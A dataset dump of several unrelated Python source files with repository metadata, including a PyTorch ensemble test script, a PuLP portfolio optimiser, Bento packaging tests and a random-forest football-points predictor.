    # Checkpoints of the 8 ensemble members, one per training seed/split.
    checkpoint_path_1 = './{}/{}/{}/7_seed_28/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
    checkpoint_path_2 = './{}/{}/{}/6_seed_30/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
    checkpoint_path_3 = './{}/{}/{}/5_seed_32/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
    checkpoint_path_4 = './{}/{}/{}/4_seed_34/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
    checkpoint_path_5 = './{}/{}/{}/3_seed_36/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
    checkpoint_path_6 = './{}/{}/{}/2_seed_38/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
    checkpoint_path_7 = './{}/{}/{}/1_seed_40/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
    checkpoint_path_8 = './{}/{}/{}/0_seed_42/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
    model_fl_1.to(device=device)
    model_fl_2.to(device=device)
    model_fl_3.to(device=device)
    model_fl_4.to(device=device)
    model_fl_5.to(device=device)
    model_fl_6.to(device=device)
    model_fl_7.to(device=device)
    model_fl_8.to(device=device)
    # NOTE(review): map_location is computed but never used; every
    # torch.load below hardcodes "cuda:0" regardless of local_rank.
    map_location = {'cuda:%d' % 0: 'cuda:%d' % args.local_rank}
    if args.load:
        model_fl_1.load_state_dict(
            torch.load(checkpoint_path_1, map_location="cuda:0")
        )
        model_fl_2.load_state_dict(
            torch.load(checkpoint_path_2, map_location="cuda:0")
        )
        model_fl_3.load_state_dict(
            torch.load(checkpoint_path_3, map_location="cuda:0")
        )
        model_fl_4.load_state_dict(
            torch.load(checkpoint_path_4, map_location="cuda:0")
        )
        model_fl_5.load_state_dict(
            torch.load(checkpoint_path_5, map_location="cuda:0")
        )
        model_fl_6.load_state_dict(
            torch.load(checkpoint_path_6, map_location="cuda:0")
        )
        model_fl_7.load_state_dict(
            torch.load(checkpoint_path_7, map_location="cuda:0")
        )
        model_fl_8.load_state_dict(
            torch.load(checkpoint_path_8, map_location="cuda:0")
        )
    # faster convolutions, but more memory
    # cudnn.benchmark = True
    try:
        test_net(model_fl_1,
                  model_fl_2,
                  model_fl_3,
                  model_fl_4,
                  model_fl_5,
                  model_fl_6,
                  model_fl_7,
                  model_fl_8,
                  test_dir,
                  device=device,
                  epochs=args.epochs,
                  batch_size=args.batchsize,
                  image_size=img_size)
    except KeyboardInterrupt:
        # NOTE(review): model_fl is only defined for the non-ensemble
        # backbones, so this handler raises NameError when interrupting a
        # resnext101/efficientnet run -- confirm and fix upstream.
        torch.save(model_fl.state_dict(), 'INTERRUPTED.pth')
        logging.info('Saved interrupt')
        try:
            sys.exit(0)
        except SystemExit:
            os._exit(0)
| 43.640523 | 384 | 0.626704 |
'''
Code of testing
'''
import argparse
import logging
import os
import sys
import csv
import time
import torch
import numpy as np
import pandas as pd
import torch.nn as nn
from tqdm import tqdm
from pycm import *
import matplotlib
import matplotlib.pyplot as plt
from dataset import BasicDataset_OUT
from torch.utils.data import DataLoader
from model import Resnet101_fl, InceptionV3_fl, Densenet161_fl, Resnext101_32x8d_fl, MobilenetV2_fl, Vgg16_bn_fl, Efficientnet_fl
#torch.distributed.init_process_group(backend="nccl")
# Global Matplotlib font configuration used by any plots this script makes.
font = {
        'weight' : 'normal',
        'size'   : 18}
plt.rc('font',family='Times New Roman')
matplotlib.rc('font', **font)
def test_net(model_fl_1,
              model_fl_2,
              model_fl_3,
              model_fl_4,
              model_fl_5,
              model_fl_6,
              model_fl_7,
              model_fl_8,
              test_dir,
              device,
              epochs=5,
              batch_size=20,
              image_size=(512,512),
              save_cp=True,
              ):
    """
    Run the 8-model ensemble over the test set listed in *test_dir* and
    write per-image softmax means, standard deviations, and the ensemble
    prediction to CSV.

    NOTE(review): relies on the module-level `args` (task/load/model/
    dataset/n_class) being set by get_args() before this is called.
    """
    since = time.time()
    storage_path ="Ensemble_exp_{}/{}/train_on_{}/test_on_{}/".format(args.task, args.load, args.model, args.dataset)
    #dir_mask = "./data/{}/training/1st_manual/".format(args.dataset)
    dataset_name = args.dataset
    n_classes = args.n_class
    # create files
    if not os.path.isdir(storage_path):
        os.makedirs(storage_path)
    dataset = BasicDataset_OUT(test_dir, image_size, n_classes, train_or=False)
    n_test = len(dataset)
    val_loader = DataLoader(dataset, batch_size, shuffle=False, num_workers=16, pin_memory=False, drop_last=False)
    # Accumulators over the whole test set.
    prediction_decode_list = []
    filename_list = []
    prediction_list_mean = []
    prediction_list_std = []
    mask_pred_tensor_small_all = 0
    for epoch in range(epochs):
        model_fl_1.eval()
        model_fl_2.eval()
        model_fl_3.eval()
        model_fl_4.eval()
        model_fl_5.eval()
        model_fl_6.eval()
        model_fl_7.eval()
        model_fl_8.eval()
        with tqdm(total=n_test, desc=f'Epoch {epoch + 1}/{epochs}', unit='img') as pbar:
            for batch in val_loader:
                imgs = batch['image']
                filename = batch['img_file'][0]
                # Reset the running softmax sum for this batch.
                mask_pred_tensor_small_all = 0
                imgs = imgs.to(device=device, dtype=torch.float32)
                ##################sigmoid or softmax
                prediction_list = []
                with torch.no_grad():
                    #print(real_patch.size())
                    # Each of the 8 members contributes a softmax map; the sum
                    # is averaged below and the per-member maps are kept to
                    # compute the ensemble mean/std per class.
                    prediction = model_fl_1(imgs)
                    prediction_softmax = nn.Softmax(dim=1)(prediction)
                    mask_pred_tensor_small = prediction_softmax.clone().detach()
                    mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
                    prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
                    prediction = model_fl_2(imgs)
                    prediction_softmax = nn.Softmax(dim=1)(prediction)
                    mask_pred_tensor_small = prediction_softmax.clone().detach()
                    mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
                    prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
                    prediction = model_fl_3(imgs)
                    prediction_softmax = nn.Softmax(dim=1)(prediction)
                    mask_pred_tensor_small = prediction_softmax.clone().detach()
                    mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
                    prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
                    prediction = model_fl_4(imgs)
                    prediction_softmax = nn.Softmax(dim=1)(prediction)
                    mask_pred_tensor_small = prediction_softmax.clone().detach()
                    mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
                    prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
                    prediction = model_fl_5(imgs)
                    prediction_softmax = nn.Softmax(dim=1)(prediction)
                    mask_pred_tensor_small = prediction_softmax.clone().detach()
                    mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
                    prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
                    prediction = model_fl_6(imgs)
                    prediction_softmax = nn.Softmax(dim=1)(prediction)
                    mask_pred_tensor_small = prediction_softmax.clone().detach()
                    mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
                    prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
                    prediction = model_fl_7(imgs)
                    prediction_softmax = nn.Softmax(dim=1)(prediction)
                    mask_pred_tensor_small = prediction_softmax.clone().detach()
                    mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
                    prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
                    prediction = model_fl_8(imgs)
                    prediction_softmax = nn.Softmax(dim=1)(prediction)
                    mask_pred_tensor_small = prediction_softmax.clone().detach()
                    mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
                    prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
                # Average of the 8 member softmaxes; argmax gives the class.
                mask_pred_tensor_small_all = mask_pred_tensor_small_all/8
                _,prediction_decode = torch.max(mask_pred_tensor_small_all, 1)
                prediction_list = np.array(prediction_list)
                prediction_list_mean.extend(np.mean(prediction_list, axis=0))
                prediction_list_std.extend(np.std(prediction_list, axis=0))
                prediction_decode_list.extend(prediction_decode.cpu().detach().numpy())
                filename_list.extend(filename)
                pbar.update(imgs.shape[0])
    # Columns: per-class ensemble softmax mean and std (classes: good /
    # usable / bad), plus the decoded class index.
    Data4stage2 = pd.DataFrame({'Name':filename_list, 'softmax_good':np.array(prediction_list_mean)[:,0],'softmax_usable':np.array(prediction_list_mean)[:,1],'softmax_bad':np.array(prediction_list_mean)[:,2], 'good_sd':np.array(prediction_list_std)[:,0],'usable_sd':np.array(prediction_list_std)[:,1],'bad_sd':np.array(prediction_list_std)[:,2], 'Prediction': prediction_decode_list})
    Data4stage2.to_csv('./test_outside/results_ensemble.csv', index = None, encoding='utf8')
    if not os.path.exists('../Results/M1'):
        os.makedirs('../Results/M1')
    Data4stage2.to_csv('../Results/M1/results_ensemble.csv', index = None, encoding='utf8')
def get_args():
    """Build and parse the command-line arguments for the ensemble test run."""
    arg_parser = argparse.ArgumentParser(description='Train the UNet on images and target masks',
                                         formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    # Training-loop controls.
    arg_parser.add_argument('-e', '--epochs', metavar='E', type=int, default=240,
                            help='Number of epochs', dest='epochs')
    arg_parser.add_argument('-b', '--batch-size', metavar='B', type=int, nargs='?', default=6,
                            help='Batch size', dest='batchsize')
    # Checkpoint / data selection.
    arg_parser.add_argument('-f', '--train_on_dataset', dest='load', type=str, default=False,
                            help='Load model from a .pth file')
    arg_parser.add_argument( '-dir', '--test_csv_dir', metavar='tcd', type=str,
                            help='path to the csv', dest='test_dir')
    arg_parser.add_argument( '-n_class', '--n_classes', dest='n_class', type=int, default=False,
                            help='number of class')
    arg_parser.add_argument( '-d','--test_on_dataset', dest='dataset', type=str,
                            help='dataset name')
    arg_parser.add_argument( '-t', '--task_name', dest='task', type=str,
                            help='The task name')
    arg_parser.add_argument( '-r', '--round', dest='round', type=int,
                            help='Number of round')
    arg_parser.add_argument( '-m', '--model', dest='model', type=str,
                            help='Backbone of the model')
    # Reproducibility / distributed settings.
    arg_parser.add_argument('--seed_num', type=int, default=42, help='Validation split seed', dest='seed')
    arg_parser.add_argument('--local_rank', default=0, type=int)
    return arg_parser.parse_args()
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
    args = get_args()
    torch.cuda.set_device(args.local_rank)
    device = torch.device("cuda", args.local_rank)
    #logging.info(f'Using device {device}')
    test_dir = args.test_dir
    dataset = args.dataset
    img_size = (512, 512)

    # Backbones for which only a single network exists. NOTE(review): the
    # original built one model for these but then unconditionally used
    # model_fl_1..model_fl_8 below, raising NameError; we now fail fast
    # with an explicit error instead.
    SINGLE_MODEL_BACKBONES = {
        'inceptionv3': InceptionV3_fl,
        'densenet161': Densenet161_fl,
        'resnet101': Resnet101_fl,
        'mobilenetv2': MobilenetV2_fl,
        'vgg16bn': Vgg16_bn_fl,
    }
    # Backbones trained as an 8-member, seed-varied ensemble.
    ENSEMBLE_BACKBONES = {
        'resnext101': Resnext101_32x8d_fl,
        'efficientnet': Efficientnet_fl,
    }

    if args.model in ENSEMBLE_BACKBONES:
        factory = ENSEMBLE_BACKBONES[args.model]
        models = [factory(pretrained=True) for _ in range(8)]
    elif args.model in SINGLE_MODEL_BACKBONES:
        raise ValueError(
            "Backbone '%s' has a single trained network; this ensemble "
            "test script supports: %s"
            % (args.model, ', '.join(sorted(ENSEMBLE_BACKBONES))))
    else:
        raise ValueError("Unknown backbone '%s'" % args.model)

    # Checkpoint k (1-based) lives in '<8-k>_seed_<26+2k>': 7_seed_28 for
    # the first member down to 0_seed_42 for the eighth — the same order
    # as the original hard-coded checkpoint_path_1..checkpoint_path_8.
    checkpoint_paths = [
        './{}/{}/{}/{}_seed_{}/best_loss_checkpoint.pth'.format(
            args.task, args.load, args.model, 8 - k, 26 + 2 * k)
        for k in range(1, 9)
    ]

    for m in models:
        m.to(device=device)

    map_location = {'cuda:%d' % 0: 'cuda:%d' % args.local_rank}
    if args.load:
        for m, ckpt in zip(models, checkpoint_paths):
            m.load_state_dict(torch.load(ckpt, map_location="cuda:0"))

    # faster convolutions, but more memory
    # cudnn.benchmark = True
    try:
        test_net(*models,
                 test_dir,
                 device=device,
                 epochs=args.epochs,
                 batch_size=args.batchsize,
                 image_size=img_size)
    except KeyboardInterrupt:
        # BUGFIX: the original saved the undefined name `model_fl` here,
        # which raised NameError; save the first ensemble member instead.
        torch.save(models[0].state_dict(), 'INTERRUPTED.pth')
        logging.info('Saved interrupt')
        try:
            sys.exit(0)
        except SystemExit:
            os._exit(0)
| 7,993 | 0 | 46 |
b90f7db21c8d8c225c6f1cad8ec1625177bb1306 | 128 | py | Python | app/googlesearch.py | logoogol/docker-blog | 57c1615b88474dd1e96fb6b4fb4311d7fd6b1e5f | [
"Unlicense"
] | null | null | null | app/googlesearch.py | logoogol/docker-blog | 57c1615b88474dd1e96fb6b4fb4311d7fd6b1e5f | [
"Unlicense"
] | null | null | null | app/googlesearch.py | logoogol/docker-blog | 57c1615b88474dd1e96fb6b4fb4311d7fd6b1e5f | [
"Unlicense"
] | null | null | null | from googlesearch import search
query = "fastapi"
for i in search(query, tld="co.in", num=10, stop=10, pause=2):
print(i) | 21.333333 | 62 | 0.679688 | from googlesearch import search
query = "fastapi"
for i in search(query, tld="co.in", num=10, stop=10, pause=2):
print(i) | 0 | 0 | 0 |
1b70ce2758a4f45779a3bc09fae2ec3f214f03e2 | 1,403 | py | Python | python/primary_implementation_case_1111.py | MichaelWehar/BooleanMatrixRectangleProblem | fb59e80d9c6b2d0d1137a9df38274648eee3c79e | [
"MIT"
] | 6 | 2020-06-17T21:56:28.000Z | 2021-12-17T18:15:51.000Z | python/primary_implementation_case_1111.py | MichaelWehar/BooleanMatrixRectangleProblem | fb59e80d9c6b2d0d1137a9df38274648eee3c79e | [
"MIT"
] | 3 | 2019-05-24T00:03:45.000Z | 2020-06-11T07:23:36.000Z | python/primary_implementation_case_1111.py | MichaelWehar/BooleanMatrixRectangleProblem | fb59e80d9c6b2d0d1137a9df38274648eee3c79e | [
"MIT"
] | 1 | 2020-06-17T21:57:57.000Z | 2020-06-17T21:57:57.000Z | # Created on 5/21/20
# Author: Ari Liloia and Michael Wehar
| 45.258065 | 95 | 0.595866 | # Created on 5/21/20
# Author: Ari Liloia and Michael Wehar
def rectExists(m, n, matrix):
    """Return True iff the m x n boolean matrix contains an axis-aligned
    rectangle whose four corners are all True.

    Equivalently: do two distinct rows share True entries in the same two
    columns? We remember every (column, column) pair of True cells seen
    in earlier rows; the first repeat proves a rectangle exists.
    Worst case O(m * n^2) time and O(n^2) space.
    """
    seen_column_pairs = set()
    for row in range(m):
        # Columns holding a True (or 1) entry in this row.
        true_columns = [col for col in range(n) if matrix[row][col] == True]
        for left, col_a in enumerate(true_columns):
            for col_b in true_columns[left + 1:]:
                pair = (col_a, col_b)
                if pair in seen_column_pairs:
                    return True
                seen_column_pairs.add(pair)
    return False
| 1,320 | 0 | 23 |
70b6edf1d7ed5c850c6fa6c6f71b89b1b6eca662 | 1,026 | py | Python | mshtensorflow/utilities.py | adhamhesham97/Deep-Learning-framework | 7904b993fd7c45f4c0b7fbe028eacd3ce2773d7f | [
"MIT"
] | null | null | null | mshtensorflow/utilities.py | adhamhesham97/Deep-Learning-framework | 7904b993fd7c45f4c0b7fbe028eacd3ce2773d7f | [
"MIT"
] | 1 | 2021-02-05T07:58:20.000Z | 2021-02-05T07:58:20.000Z | mshtensorflow/utilities.py | adhamhesham97/Deep-Learning-framework | 7904b993fd7c45f4c0b7fbe028eacd3ce2773d7f | [
"MIT"
] | 2 | 2021-01-25T14:50:14.000Z | 2021-05-24T22:07:12.000Z | # -*- coding: utf-8 -*-
"""
Created on Sun Jan 17 04:01:48 2021
@author: Adham
"""
from .Model import model
import numpy as np
import pickle | 25.65 | 54 | 0.568226 | # -*- coding: utf-8 -*-
"""
Created on Sun Jan 17 04:01:48 2021
@author: Adham
"""
from .Model import model
import numpy as np
import pickle
def hot_one(labels, num_classes):
    """One-hot encode a 1-D array of integer class labels.

    Parameters:
        labels: array of shape (num_of_examples,) holding class indices
            in [0, num_classes) (float arrays are truncated to int, as
            the original per-element int() did).
        num_classes: number of classes, i.e. rows of the result.

    Returns:
        ndarray of shape (num_classes, num_of_examples) where column i
        is the one-hot encoding of labels[i].
    """
    num_of_examples = labels.shape[0]
    encoded = np.zeros((num_classes, num_of_examples))
    # Vectorized fancy indexing replaces the original Python loop (and
    # the local variable that shadowed the function's own name).
    encoded[labels.astype(int), np.arange(num_of_examples)] = 1
    return encoded
def store(Model, filename):
    """Pickle Model's parameters to models/<filename>.dat.

    Parameters:
        Model: object exposing getParams() (the framework's model type).
        filename: base name; '.dat' is appended when missing.
    """
    import os  # local import: this module does not import os at top level
    if not filename.endswith(".dat"):
        filename += ".dat"
    # Portability fix: the original concatenated the Windows-only prefix
    # 'models\\', which on POSIX created a file literally named
    # 'models\\<name>' in the cwd instead of a file inside models/.
    os.makedirs('models', exist_ok=True)
    with open(os.path.join('models', filename), "wb") as f:
        pickle.dump(Model.getParams(), f)
def load(filename):
    """Load pickled parameters from models/<filename>.dat into a new model.

    Falls back to treating `filename` as a bare path when the models/
    copy cannot be read. On total failure the fresh (unparameterized)
    model is returned and a message is printed, preserving the original
    best-effort contract.

    Returns:
        The (possibly still empty) model instance.
    """
    import os  # local import: this module does not import os at top level
    Model = model()
    if not filename.endswith(".dat"):
        filename += ".dat"
    # Narrowed from the original bare `except:` clauses, which swallowed
    # every error (including KeyboardInterrupt) as "file not found".
    for path in (os.path.join('models', filename), filename):
        try:
            with open(path, "rb") as f:
                layers = pickle.load(f)
        except (OSError, pickle.UnpicklingError, EOFError):
            continue
        Model.setParams(layers)
        break
    else:
        print ("file not found")
    return Model
92bd0a2d6dc3498cd87834e41655cd486ff86538 | 1,334 | py | Python | src/modules/stepwise_log.py | ArturPrzybysz/ProbabilisticDeepDiffusionModels | 3056d8da25107aeeb122106e63958bb3fc62d7a4 | [
"MIT"
] | null | null | null | src/modules/stepwise_log.py | ArturPrzybysz/ProbabilisticDeepDiffusionModels | 3056d8da25107aeeb122106e63958bb3fc62d7a4 | [
"MIT"
] | null | null | null | src/modules/stepwise_log.py | ArturPrzybysz/ProbabilisticDeepDiffusionModels | 3056d8da25107aeeb122106e63958bb3fc62d7a4 | [
"MIT"
] | null | null | null | import numpy as np
| 35.105263 | 84 | 0.614693 | import numpy as np
class StepwiseLog:
    """Running per-timestep statistics of a metric over diffusion steps.

    For each timestep t in [1, diffusion_steps] this keeps the recent
    metric values (optionally capped at `max_keep` entries), their mean,
    their root-mean-square, and a count of update calls.
    """

    def __init__(self, diffusion_steps, max_keep=None):
        # max_keep: if not None, only the most recent `max_keep` values
        # per timestep are retained for the running statistics.
        self.diffusion_steps = diffusion_steps
        self.max_keep = max_keep
        self.reset()

    def reset(self):
        """Clear all stored values and statistics."""
        self.metric_per_t = {t: [] for t in range(1, self.diffusion_steps + 1)}
        self.avg_per_step = np.zeros(self.diffusion_steps)
        self.avg_sq_per_step = np.zeros(self.diffusion_steps)
        self.n_per_step = np.zeros(self.diffusion_steps)

    def update(self, t, metric):
        """Record `metric` at timestep `t`; non-finite values are ignored."""
        if np.isfinite(metric):
            self.metric_per_t[t].append(metric)
            # BUGFIX: the original tested len(self.metric_per_t) — the
            # number of timesteps, a constant — so whether trimming ever
            # happened depended on diffusion_steps instead of on how many
            # values were stored for this timestep.
            if self.max_keep is not None and len(self.metric_per_t[t]) > self.max_keep:
                self.metric_per_t[t] = self.metric_per_t[t][-self.max_keep:]
            self.avg_per_step[t - 1] = np.mean(self.metric_per_t[t])
            self.avg_sq_per_step[t - 1] = np.sqrt(
                np.mean(np.power(self.metric_per_t[t], 2))
            )
            self.n_per_step[t - 1] += 1

    def update_multiple(self, ts, metrics):
        """Record several (timestep, metric) pairs in lockstep."""
        for t, m in zip(ts, metrics):
            self.update(t, m)

    def get_avg_in_range(self, t0, t1):
        """Mean of all retained values for timesteps t0 <= t < t1."""
        # TODO: averaging within steps??
        return np.concatenate([self.metric_per_t[t] for t in range(t0, t1)]).mean()

    def __getitem__(self, t):
        return self.metric_per_t[t]
| 1,133 | -3 | 184 |
7a1e62a32c2100b9e0e9ce8499a978935b09eb5e | 1,034 | py | Python | src/model.py | vilelabruno/MarcowitzPortfolioOPT | 54086d5004b5b05f811732efe229931f3af0a6fa | [
"MIT"
] | 2 | 2020-03-09T14:39:50.000Z | 2020-03-10T12:48:25.000Z | src/model.py | vilelabruno/MarkowitzPortfolioOPT | 54086d5004b5b05f811732efe229931f3af0a6fa | [
"MIT"
] | null | null | null | src/model.py | vilelabruno/MarkowitzPortfolioOPT | 54086d5004b5b05f811732efe229931f3af0a6fa | [
"MIT"
] | null | null | null | from pulp import *
if __name__ == "main":
main() | 34.466667 | 75 | 0.569632 | from pulp import *
def main():
    """Solve a max-min (robust) portfolio LP with PuLP.

    Maximizes x subject to: for every scenario vector in vv_set.set, the
    weight-averaged excess of v over that vector is at least x, with
    weights w_i in [0, 1] summing to 1.

    Returns:
        (weights, True) when the optimum x is positive, or when vv_set
        is empty (any point of the weight simplex works); otherwise
        ([], False).

    NOTE(review): v, vv_set, np, reduce and operator are not defined or
    imported in this module (only `from pulp import *` is visible) —
    presumably injected globals; confirm before running.
    """
    x = LpVariable('x')
    w_vars = []
    problem = LpProblem('portfolio_theory', LpMaximize)
    # One weight variable per asset, bounded to [0, 1].
    for i in range(v.shape[0]):
        w_i = LpVariable('w_' + str(i), 0, 1)
        w_vars.append(w_i)
    # For each scenario, sum_i w_i * (v_i - vector_i) - x >= 0.
    for vector in vv_set.set:
        diff_list = []
        for index, _ in enumerate(vector):
            diff = v[index] - vector[index]
            diff_list.append(w_vars[index] * diff)
        problem += reduce(operator.add, diff_list, -x) >= 0
    # Weights must lie on the simplex.
    problem += reduce(operator.add, w_vars, 0) == 1
    problem += x #What to optimise, i.e., x
    status = problem.solve()
    if value(x) <= 0:
        if(len(vv_set.set)==0):
            #Special case: in this case x is not in the problem and
            #any solution in the weight simplex goes. Therefore, x retained
            #its initial value of 0
            return np.array([value(w) for w in w_vars]), True
        return [], False
    else:
        return np.array([value(w) for w in w_vars]), True
if __name__ == '__main__':
    # BUGFIX: the original compared __name__ against 'main', which is
    # never its value, so main() could never run from the command line.
    main()
05914362d55bdb70b02c058cc14030c673112fc3 | 3,713 | py | Python | bento/core/tests/test_package.py | abadger/Bento | 3f1ddefd8d21decbc018d097d3ec5da4dc9364df | [
"BSD-3-Clause"
] | 1 | 2015-10-25T13:08:36.000Z | 2015-10-25T13:08:36.000Z | bento/core/tests/test_package.py | abadger/Bento | 3f1ddefd8d21decbc018d097d3ec5da4dc9364df | [
"BSD-3-Clause"
] | null | null | null | bento/core/tests/test_package.py | abadger/Bento | 3f1ddefd8d21decbc018d097d3ec5da4dc9364df | [
"BSD-3-Clause"
] | null | null | null | import unittest
import os
import tempfile
from nose.tools import \
assert_equal
from bento import PackageDescription
from bento.core.package import file_list, static_representation
from bento.core.meta import PackageMetadata
from bento.core.pkg_objects import DataFiles
from bento.core.node import Node
| 32.286957 | 88 | 0.601939 | import unittest
import os
import tempfile
from nose.tools import \
assert_equal
from bento import PackageDescription
from bento.core.package import file_list, static_representation
from bento.core.meta import PackageMetadata
from bento.core.pkg_objects import DataFiles
from bento.core.node import Node
def create_file(file, makedirs=True):
    """Create an empty file, optionally creating missing parent directories.

    Parameters:
        file: path of the file to create (truncated if it already exists).
        makedirs: when True, create any missing parent directories first.
    """
    if makedirs:
        dirname = os.path.dirname(file)
        # Guard against '' (a bare filename in the cwd): os.makedirs('')
        # raises even though the target is directly creatable.
        if dirname and not os.path.exists(dirname):
            os.makedirs(dirname)
    # 'with' guarantees the handle is closed; the original bound the
    # useless None returned by close() to a throwaway variable.
    with open(file, "w"):
        pass
def clean_tree(files):
    """Delete the given files, then their (now empty) parent directories.

    Parent directories are removed deepest-first so nested paths empty
    out before their parents are rmdir'ed. Directories must end up empty
    or os.rmdir will raise, matching the original behavior.
    """
    parent_dirs = set()
    for path in files:
        parent_dirs.add(os.path.dirname(path))
        if os.path.exists(path):
            os.remove(path)
    for directory in sorted(parent_dirs, reverse=True):
        os.rmdir(directory)
class TestPackage(unittest.TestCase):
    """Tests for bento.core.package helpers against a real temp tree."""
    def test_file_list(self):
        """file_list(pkg, node) must report exactly the package's files."""
        # Create a simple package in temp dir, and check file_list(pkg) is what
        # we expect
        _files = [
            os.path.join("pkg", "__init__.py"),
            os.path.join("pkg", "yo.py"),
            os.path.join("module.py"),
            os.path.join("data", "foo.dat"),
        ]
        d = tempfile.mkdtemp()
        root = Node("", None)
        top_node = root.find_dir(d)
        files = [os.path.join(d, "foo", f) for f in _files]
        try:
            for f in files:
                create_file(f)
            pkg = PackageDescription(name="foo",
                                     packages=["pkg"],
                                     py_modules=["module"],
                                     data_files={"data":
                                         DataFiles("data", files=["data/foo.dat"],
                                                   target_dir="$prefix",
                                                   source_dir=".")
                                     })
            fl = [os.path.normpath(f) for f in file_list(pkg, top_node.find_dir("foo"))]
            # Ordering of file_list output is not specified: compare sorted.
            assert_equal(sorted(fl), sorted(_files))
        finally:
            # Always tear the scratch tree down, even when the test fails.
            clean_tree(files)
            os.rmdir(d)
class TestStaticRepresentation(unittest.TestCase):
    """Round-trip tests: re-parsing static_representation() output must
    produce an equivalent static representation."""
    def test_metadata(self):
        """A metadata-rich description survives the round trip."""
        bento_info = """\
Name: Sphinx
Version: 0.6.3
Summary: Python documentation generator
Url: http://sphinx.pocoo.org/
DownloadUrl: http://pypi.python.org/pypi/Sphinx
Description: Some long description.
Author: Georg Brandl
AuthorEmail: georg@python.org
Maintainer: Georg Brandl
MaintainerEmail: georg@python.org
License: BSD
Platforms: any
Classifiers:
    Development Status :: 4 - Beta,
    Environment :: Console,
    Environment :: Web Environment,
    Intended Audience :: Developers,
    License :: OSI Approved :: BSD License,
    Operating System :: OS Independent,
    Programming Language :: Python,
    Topic :: Documentation,
    Topic :: Utilities
"""
        self._static_representation(bento_info)
    def test_simple_library(self):
        """A minimal Library section survives the round trip."""
        bento_info = """\
Name: foo
Library:
    Packages: foo
"""
        self._static_representation(bento_info)
    def _static_representation(self, bento_info):
        """Helper: assert static_representation is stable after one re-parse."""
        r_pkg = PackageDescription.from_string(bento_info)
        # We recompute pkg to avoid dealing with stylistic difference between
        # original and static_representation
        pkg = PackageDescription.from_string(static_representation(r_pkg))
        assert_equal(static_representation(pkg), static_representation(r_pkg))
class TestPackageMetadata(unittest.TestCase):
    """Sanity checks for attributes derived by PackageMetadata."""
    def test_ctor(self):
        """fullname/contact/contact_email derive from ctor arguments."""
        meta = PackageMetadata(name="foo", version="1.0", author="John Doe",
                               author_email="john@doe.com")
        assert_equal(meta.fullname, "foo-1.0")
        assert_equal(meta.contact, "John Doe")
        assert_equal(meta.contact_email, "john@doe.com")
| 3,088 | 69 | 247 |
63b3b97ccf4be9b5fc60a99d9e914cc8ddfdc44a | 3,016 | py | Python | Season_Data/RandomForest.py | mattyopl/FPL_ML | c39dbd2370860f0e31ccdd8950518f7042853ba1 | [
"MIT"
] | null | null | null | Season_Data/RandomForest.py | mattyopl/FPL_ML | c39dbd2370860f0e31ccdd8950518f7042853ba1 | [
"MIT"
] | null | null | null | Season_Data/RandomForest.py | mattyopl/FPL_ML | c39dbd2370860f0e31ccdd8950518f7042853ba1 | [
"MIT"
] | null | null | null | import pandas as pd
import math
from sklearn.ensemble import RandomForestRegressor
trainInput = pd.read_excel("FPL_Season_Data_Only_Inputs_Shuffled2.xlsx")
trainInput = trainInput.drop(trainInput.columns[0], axis=1)
trainOutput = pd.read_excel("FPL_Season_Data_Only_Outputs_Shuffled2.xlsx")
trainOutput = trainOutput.pop("Points")
position = pd.get_dummies(trainInput["Position"],prefix="Position")
trainInput = pd.concat([position,trainInput], axis =1)
trainInput.drop(["Position"], axis=1, inplace=True)
trainInput.drop(["YC"], axis=1, inplace=True)
trainInput.drop(["RC"], axis=1, inplace=True)
trainInput.drop(["Bonus Points"], axis=1, inplace=True)
df = pd.read_excel("PredictionsData.xlsx")
position = pd.get_dummies(df["Position"],prefix="Position")
df = pd.concat([position,df], axis =1)
df.drop(["Position"], axis=1, inplace=True)
df.drop(["YC"], axis=1, inplace=True)
df.drop(["RC"], axis=1, inplace=True)
df.drop(["Bonus Points"], axis=1, inplace=True)
names = df.pop("Name")
regressor = RandomForestRegressor(n_estimators = 10000, random_state=30)
regressor.fit(trainInput,trainOutput)
predictions = regressor.predict(df)
predictionsDF = pd.DataFrame(predictions, columns=["Points"])
predictionsDF = pd.concat([names, predictionsDF],axis=1)
predictionsDF.sort_values("Points",ascending=False, inplace=True)
predictionsDF.to_excel("PredictionsRF10k.xlsx")
# import numpy as np
# import tensorflow as tf
# import pandas as pd
# import wandb
# from wandb.keras import WandbCallback
# #initializing
# np.set_printoptions(precision=4, suppress=True)
# wandb.init(project="RandomForest", entity="matthewlchen",sync_tensorboard=True)
# #pulling data
# trainInput = pd.read_excel("FPL_Season_Data_Only_Inputs_Shuffled2.xlsx")
# trainInput = trainInput.drop(trainInput.columns[0], axis=1)
# trainOutput = pd.read_excel("FPL_Season_Data_Only_Outputs_Shuffled2.xlsx")
# trainOutput = trainOutput.pop("Points")
# #transforming categorical position data into one hot encoding
# position = pd.get_dummies(trainInput["Position"],prefix="Position")
# trainInput = pd.concat([position,trainInput], axis =1)
